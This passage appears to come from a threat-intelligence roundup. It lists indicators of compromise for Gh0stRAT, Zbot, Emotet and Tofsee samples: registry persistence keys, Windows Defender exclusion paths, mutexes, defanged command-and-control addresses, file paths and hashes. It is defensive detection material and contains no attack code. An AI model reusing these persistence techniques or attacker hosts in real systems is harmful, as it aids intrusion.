ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rwpuc1aH2a0/XeqOuD03BqI/AAAAAAAAC88/rGe5osqIbpMY7NqD2eg-Bu4MK1IlxH7fwCLcBGAsYHQ/s1600/df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-QQGGtbApk_8/XeqOy42R62I/AAAAAAAAC9A/Q9SBHgcVTJkYg4NTtHQno0BQCiSUfObZACLcBGAsYHQ/s1600/2eee4a29498a0d25c8d53e306c3b2414b839363992364cabbbe3fe2fd46caa9c_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Gh0stRAT-7414189-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EM ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Micro ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: SHR ` | 12 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\OLE \nValue Name: EnableDCOM ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\OLE \nValue Name: EnableRemoteConnect ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\LSA \nValue Name: restrictanonymous ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\\SCHANNEL\\PROTOCOLS\\PCT1.0\\SERVER \nValue Name: Enabled ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANSERVER\\PARAMETERS \nValue Name: AutoShareWks ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANSERVER\\PARAMETERS \nValue Name: AutoShareServer ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\\SCHANNEL\\PROTOCOLS\\PCT1.0 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Depend ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\\SCHANNEL\\PROTOCOLS\\PCT1.0\\SERVER ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \n`<HKCU>\\SOFTWARE\\CSER_513_2 ` | 1 \n`<HKCU>\\SOFTWARE\\CSER_513_2\\14B65331773AD534DADA9C7B055E34A1E6AB2A54F3D8EEC4D1DA6298F0477C71 ` | 1 \n`<HKCU>\\SOFTWARE\\CSER_513_2\\14B65331773AD534DADA9C7B055E34A1E6AB2A54F3D8EEC4D1DA6298F0477C71\\GAMESETTING ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ce ` | 1 \nMutexes | Occurrences \n---|--- \n`0x5d65r455f` | 25 \n`Mhost123.zz.am:6658` | 25 \n`host123.zz.am:6658` | 25 \n`107.163.241.193:6520` | 17 \n`M107.163.241.193:6520` | 17 \n`107.163.56.251:6658` | 12 \n`M107.163.56.251:6658` | 12 \n`{1B655094-FE2A-433c-A877-FF9793445069}` | 1 \n`Local\\https://pos.baidu.com/` | 1 \n`Global\\a80e8341-11ce-11ea-a007-00501e3ae7b5` | 1 \n`D` | 1 \n`CiM` | 1 \n`Crack iN Morroco 2k7` | 1 \n`174.139.81.2:3204` | 1 \n`M174.139.81.2:3204` | 1 \n`Global\\a9c98181-11ce-11ea-a007-00501e3ae7b5` | 1 \n`Local\\https://www.onlinedown.net/` | 1 \n`root em up` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`107[.]163[.]43[.]143` | 25 \n`107[.]163[.]43[.]235` | 25 \n`107[.]163[.]43[.]236` | 25 \n`49[.]7[.]37[.]126` | 23 \n`107[.]163[.]241[.]193` | 17 \n`107[.]163[.]241[.]185` | 15 \n`107[.]163[.]241[.]186` | 15 \n`107[.]163[.]56[.]251` | 12 \n`107[.]163[.]43[.]161` | 12 \n`107[.]163[.]56[.]240/31` | 12 \n`107[.]163[.]241[.]181` | 2 \n`107[.]163[.]43[.]144` | 2 \n`107[.]163[.]241[.]182` | 2 \n`204[.]79[.]197[.]200` | 1 \n`111[.]202[.]114[.]81` | 1 \n`104[.]192[.]110[.]245` | 1 \n`103[.]235[.]46[.]191` | 1 \n`180[.]163[.]251[.]231` | 1 \n`172[.]217[.]197[.]155` | 1 \n`185[.]10[.]104[.]120` | 1 \n`172[.]217[.]7[.]14` | 1 \n`218[.]30[.]115[.]123` | 1 \n`218[.]30[.]115[.]254` | 1 \n`39[.]156[.]66[.]108` | 1 \n`113[.]96[.]178[.]35` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`blogx[.]sina[.]com[.]cn` | 25 \n`blog[.]sina[.]com[.]cn` | 25 \n`host123[.]zz[.]am` | 25 \n`s[.]360[.]cn` | 1 \n`cpro[.]baidustatic[.]com` | 1 \n`flashservice[.]adobe[.]com` | 1 \n`www[.]beian[.]gov[.]cn` | 1 \n`zz[.]bdstatic[.]com` | 1 \n`dup[.]baidustatic[.]com` | 1 \n`www[.]google-analytics[.]com` | 1 \n`stats[.]g[.]doubleclick[.]net` | 1 \n`www[.]yisu[.]com` | 1 \n`js[.]users[.]51[.]la` | 1 \n`ia[.]51[.]la` | 1 \n`www[.]pcsoft[.]com[.]cn` | 1 \n`www[.]onlinedown[.]net` | 1 \n`si[.]trustutn[.]org` | 1 \n`e[.]so[.]com` | 1 \n`sqdownb[.]onlinedown[.]net` | 1 \n`www[.]idc400[.]com` | 1 \n`bgp[.]zzidc[.]com` | 1 \n`hj[.]dun[.]gsxzq[.]com` | 1 \n`news[.]onlinedown[.]net` | 1 \n`s[.]ssl[.]qhres[.]com` | 1 \n`uuid[.]users[.]51[.]la` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\1.txt` | 55 \n`%ProgramFiles%\\<random, matching '[a-z]{5,9}\\[a-z]{3,9}'>.dll` | 54 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 50 \n`%ProgramFiles%\\<random, matching '[a-z]{5,8}'>` | 49 \n`%ProgramFiles%\\<random, matching '[a-z]{5,9}\\[a-z]{3,9}'>.exe` | 39 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 11 \n`%TEMP%\\1.reg` | 2 \n`%ProgramFiles%\\korlu\\11221450` | 2 \n`%ProgramFiles%\\fsshxf\\11271508` | 2 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 2 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sxx` | 1 \n`\\tre.bat` | 1 \n`%TEMP%\\slseyc\\nfiav.dll` | 1 \n`\\a.bat` | 1 \n`%ProgramFiles%\\vpcat\\11271508` | 1 \n`%ProgramFiles%\\blzmv\\11271508` | 1 \n`%ProgramFiles%\\zuxlr\\11271508` | 1 \n`%ProgramFiles%\\hyabka\\11271508` | 1 \n`%ProgramFiles%\\gkzmahvre\\11271508` | 1 \n`%ProgramFiles%\\gkzmahvre` | 1 \n`%ProgramFiles%\\yudusnhlp\\11271508` | 1 \n`%ProgramFiles%\\jkixqof\\11271508` | 1 \n`%ProgramFiles%\\yudusnhlp` | 1 \n`%ProgramFiles%\\tjsmc\\11271508` | 1 \n`%ProgramFiles%\\ezsor\\11271508` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00275609032024a2a413b2697b6763c964a5eeb54709ae803b68d5a77d1b46a4 019f88e9cc8c503c1ac8c6054beb978b445922cf5857f347bc8b2193a0592e82 037e1df212fbfc6c77ea55754f52b11366da8e0fd5437834762339a30e705614 04d5f107aa253ca81d99fce0201dcb6da6b21497fce62e2d37a90661951c63d8 06ee23a5be29f166749cd47784c9dafe66c0ca4ec7b70e6e837e59ccd5a02c63 072e4fa823cf7e9646dd7e1aaa3a308d9e789700dccffacfb646bf7c7fad9ad3 07ffdb94e32a95dc75d39528b3bddc362006719fc0970c47259fc8debeaee066 08e84db9a91341f82d0dc50775e75879fc2ac20ede3abffe53cf35dc9a656019 094797bbc7234e18f2a7a30fc182a690f2f7f7b080b889ab5e6c87bb730bc911 0a03aba2e42912a9c43e5cd9c724c4991007ecd6950bda27e82446070a08bb02 0a44d155b4568d97d161d18e90e4c9e719e4c37769c2a32ca5a41d56cc101172 0af079ed6e9914b102d9c3007e7c96318a1fdb659212c35f22e2e5293d8cbeb9 0c7cf7681e128b45acaf925d598acf037177748402ab92fdf114a4d2dc5fd4ae 0dc8ab2ec624c65ff0c071b80b349c8e6de4fc4491e9751e099b63ce98c8c52e 0dd6bc63d982e053c01753cb5819362827bde9338b3d28a0b17669c0523489e0 0f75c94f848e561c2fe1bd90a5260e47267c334444579530ddfe2ad90f0e6806 1035eeb50c81c381f7b2909d062fb6d51d9e6ddc8c68478a3ef67d7b4a67b0f6 10eab7f3db36eacd08880c4998ab351c535f8b728cb0ed484edd0e84b5bdaf03 10fa3fefcb91d40da3285b063a8fd2c2f9187c1990689a487f1f2fea4a2e9240 12ebbeecf708d23ad4b4510374a622df85f5aaa806939204357f3d330b6de8d7 1439afcf233b1c829cbac8747623b3b05332ecd057660bc3639980ada64d1149 1466341e7ff5ca7511306ddd2253a03f5b81cfab21bda6ddd32047bd3f7e4011 14b65331773ad534dada9c7b055e34a1e6ab2a54f3d8eec4d1da6298f0477c71 1564fc8499c21f5426c4f15aaab34acc8936b43df39464f88003209c0ae3ea17 15c6ec4928627e4f9c56c567811e5b0b0b6c20b32374ac931257145d42365b61 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Mv4aRI8AOX8/XeqTi9dUmxI/AAAAAAAAC9U/5BPzI8obZRcDnb2-JaGVErWYRthcOb2gQCLcBGAsYHQ/s1600/0f75c94f848e561c2fe1bd90a5260e47267c334444579530ddfe2ad90f0e6806_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-seXnCnM9VzQ/XeqToSRivVI/AAAAAAAAC9Y/ApMNoFB9Ha0my7yAD1iqEM5uQo3RIwnUACLcBGAsYHQ/s1600/9e933353f508b0e5e6c0dd8a5142a747729a30627f1997f494c17eb218e462bb_tg.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-DEtRJoer14o/XeqTtYUbPqI/AAAAAAAAC9c/djjY5iDb900bDRVCNY5DJaX-GFH5enZdQCLcBGAsYHQ/s1600/0af079ed6e9914b102d9c3007e7c96318a1fdb659212c35f22e2e5293d8cbeb9_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Zbot-7414153-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\PRIVACY \nValue Name: CleanCookies ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\DUQY \nValue Name: Sianile ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Uroxiqakh ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\DUQY ` | 1 \nMutexes | Occurrences \n---|--- \n`GLOBAL\\{<random GUID>}` | 1 \n`Local\\{<random GUID>}` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`5[.]56[.]133[.]47` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\wbem\\Logs\\wbemprox.log` | 1 \n`%TEMP%\\tmp647c181c.bat` | 1 \n`%TEMP%\\tmp246f2f8d.bat` | 1 \n`%APPDATA%\\Adbe` | 1 \n`%APPDATA%\\Adbe\\udef.unu` | 1 \n`%APPDATA%\\Cukeba` | 1 \n`%APPDATA%\\Cukeba\\xoafe.idl` | 1 \n`%APPDATA%\\Olehse` | 1 \n`%APPDATA%\\Olehse\\okop.exe` | 1 \n`%APPDATA%\\Fireh\\isnib.exe` | 1 \n`%APPDATA%\\Igyg\\cuhia.obu` | 1 \n`%APPDATA%\\Igyg\\cuhia.tmp (copy)` | 1 \n \n#### File Hashes\n\n` 072bcc63bca4fa1946c71a3f9562a6d76af8fd1a5034132e2befbbde9aba9c98 15c235fefdfd798bff9bf039155762f0c0674cbf239c10df6aca52a7e2139488 2ccfd0f36677f438ff1120f21d6e5929d91531fd965dda6232ddd6de7a0c52d9 37403ce75f4908eb2e823a4e8c56c410e57441dde38c022819521a7fc3358701 40ecf36a4c2474cfff01980d68602d7bbaacfca2bdfda5ac58390b57c73b424a 522ce96681db4ef5d4731a8cf2007e7a46e650fc2f547f88d492700970b6af61 5409660ef23234d04ad204cb3791a96b3895286e258be036bfb43410e1dca08f 59b94ae4bdf3a3f4291e67e73316632b73a369391fbed4d8f3259d0ff0dc5468 66c6cb07d601f35490752227fe1d4687fbbc47af0f219eb178f89c670adccb0a 8914444fb30823c586d7df581c201dad5f1428284b7880395f2bc49ece5a1611 8daf28936db0201df94f89bd80acaae000fa018f93d6d1a1dc131b91be665382 8ea4ffdbfb16cd39bdf20a5a51ffbd6a523b78ad9a2c78bfffb46fcf0653f550 924f2ea483135213b988584241da5e5b8b152ab427fa933089e493d2dcd92c34 a807970fdd58b833a23e0c8b611a17ea5448399336f3ec0a3ecd5036486c0b08 b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619 b2787b4197407051f4a5fe4ddc6b483d3245222d0b6301ba67e7feae14b87342 b5f339fcebb67c4826f94c31eab0a3e8e8137a65204b03c8ee6a72a1a313a48e bf315e9e1ac06c214296722191b08a2925e5ed49dfcbba616606b8422047cb63 e014acc73e32e1d1cb74ab4049b46abb2bd5c06ee9d4c82aeca7f4440cbb011d e3ced6661c4f5fd339cba232c6693c79d30dd5bc8db5882e7a86e959537af18d f50b78d0ffed37ecbab524a44b4606ab7246711b3487af0a17343fb5fc93ffba fa58139b16a96c81b415d2cfe950fff73ca98ba9f0e09c753cb16cbb4b18b820 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### \n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-LlgRqENIhWM/XeqUmmT5XKI/AAAAAAAAC-E/3rnd7ok1qAoqKrKLPi6POIY4ynT8gIfhgCLcBGAsYHQ/s1600/b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-N8wlzMdz6nY/XeqUqd_31_I/AAAAAAAAC-I/Da-pTJl4u5gf_yiWNj7xUNiXGTrSYBo4wCLcBGAsYHQ/s1600/b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Downloader.Emotet-7413880-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 13 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ONDEMANDINTERFACECACHE ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:0000000000080070 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:0000000000080070 \nValue Name: VirtualDesktop ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:000000000001025C ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:000000000001025C \nValue Name: VirtualDesktop ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: Type ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: ErrorControl ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: ImagePath ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: DisplayName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: WOW64 ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 13 \n`Global\\M98B68E3C` | 13 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \n`Global\\Nx534F51BC` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`59[.]110[.]18[.]236` | 15 \n`103[.]211[.]218[.]205` | 15 \n`45[.]56[.]88[.]91` | 12 \n`51[.]254[.]137[.]156` | 8 \n`192[.]241[.]131[.]79` | 7 \n`51[.]68[.]220[.]244` | 6 \n`206[.]81[.]10[.]215` | 4 \n`217[.]149[.]241[.]121` | 3 \n`74[.]208[.]5[.]15` | 2 \n`169[.]254[.]255[.]255` | 2 \n`17[.]36[.]205[.]74` | 1 \n`173[.]194[.]204[.]109` | 1 \n`94[.]100[.]180[.]160` | 1 \n`107[.]14[.]73[.]68` | 1 \n`81[.]88[.]48[.]66` | 1 \n`184[.]106[.]54[.]11` | 1 \n`208[.]124[.]213[.]186` | 1 \n`95[.]216[.]33[.]71` | 1 \n`64[.]41[.]126[.]110` | 1 \n`64[.]98[.]36[.]173` | 1 \n`94[.]152[.]153[.]134` | 1 \n`143[.]95[.]235[.]37` | 1 \n`216[.]177[.]141[.]15` | 1 \n`52[.]96[.]38[.]82` | 1 \n`173[.]254[.]28[.]125` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`headonizm[.]in` | 15 \n`qantimagroup[.]com` | 8 \n`smtp[.]mail[.]com` | 2 \n`smtpout[.]secureserver[.]net` | 2 \n`smtp-mail[.]outlook[.]com` | 1 \n`smtp[.]mail[.]ru` | 1 \n`ssl0[.]ovh[.]net` | 1 \n`smtp[.]qiye[.]163[.]com` | 1 \n`mail1[.]hostingplatform[.]com` | 1 \n`smtp[.]corteshermanos[.]com` | 1 \n`mail[.]rekaicentres[.]com` | 1 \n`mail[.]fusat[.]cl` | 1 \n`mail[.]hces[.]net` | 1 \n`mail[.]mccmh[.]net` | 1 \n`manabi[.]ecuahosting[.]net` | 1 \n`smtp[.]cuttingedgestoneworks[.]com` | 1 \n`p52-smtp[.]mail[.]me[.]com` | 1 \n`smtp[.]siteprotect[.]com` | 1 \n`lawyers-mail[.]com` | 1 \n`mail[.]ec[.]rr[.]com` | 1 \n`just125[.]justhost[.]com` | 1 \n`mail[.]effinger-zentrum[.]ch` | 1 \n`mail[.]smscomm[.]net` | 1 \n`authsmtp[.]securemail[.]pro` | 1 \n`mail[.]lignum[.]com[.]gt` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\419.exe` | 15 \n`%ProgramData%\\Microsoft\\Crypto\\RSA\\S-1-5-18\\9bdfb692c085f99347f09462e5cd5445_9979f91c-9ae8-458a-b442-fe95beaeef26` | 2 \n`%ProgramData%\\gny7.exe` | 1 \n \n#### File Hashes\n\n` 0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab 1220dd6c5523dc0b6b6409e5b739216bc979826bcb8e43428f0889ff120fd63d 1ff11781388f142f3dd92900380de4501f12f652d20911b502dbea6d4e7c2533 2c9b1c7443421bc46987ae098dd00fa013b9722dfe6b6b518c3ab474d888d984 456f0957a36e00bf03b0e37d18e119d74b3bb08054f6248a2e7e87ddb93d7782 4bbdbcf77feea35ec8ebddead4ed7274c8404c5fe2df5d24029488424f1ce875 81fc2cb7ae6b7006b185b89427136ab8a520cbd687d0bbb5f1fc31b1a1c0f4ba 83fe7400534e8efcc5cec209b9b2835d61be0d88914bbfd6495fb675378aa2dd 8c483708b5b4230562f3d0d4dce10c6168b94ccb6e85ff5052c42513feda741e 9f48da5cd641b0bb9dffd3dec5d2442da67ed23367331eb8c181fc61ee54c41e c8078630214d7c029d23de03dedb7fab8a2f7f8df12ba99245682e3ca235179b ce11fa55f6717dadca7bdd3759b3d46217d085e78ea8bb94bb8145754741b5c5 e0ab84847c95820096ec02c1c23c15589320ddc180e6d9f0d61315409b755dc8 e74421edc6c5a113acbd4f754d64ac9502f59cbdae14ffa129357bc5251e9afc f3de992434fc44f62318ddbe2c209a11af19205bb347dac52d7534e7f3c5579a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZZGz7Mw7Z8U/XeqUJI0xf6I/AAAAAAAAC9s/gCkvLQHcGbYVoXxZKDwD5r7a7djm_ECdQCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-zTR6IMeKMG0/XeqUMrUQ9xI/AAAAAAAAC9w/x5eFuJAC-ksnhUZjpPzuyOuynw7TKP5dACLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-NaxAqYMkXLI/XeqUTyXXz6I/AAAAAAAAC94/2QIMSLmZj-8C7xCUmyUpHkVsZc-l2fQOQCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-KEWZIPleWss/XeqURNjr6gI/AAAAAAAAC90/PMISEvUv2jAWPB8fjlwfqfJroX0So17ywCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7431752-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 11 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 9 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lesyxfla ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\rkyedlrg ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 1 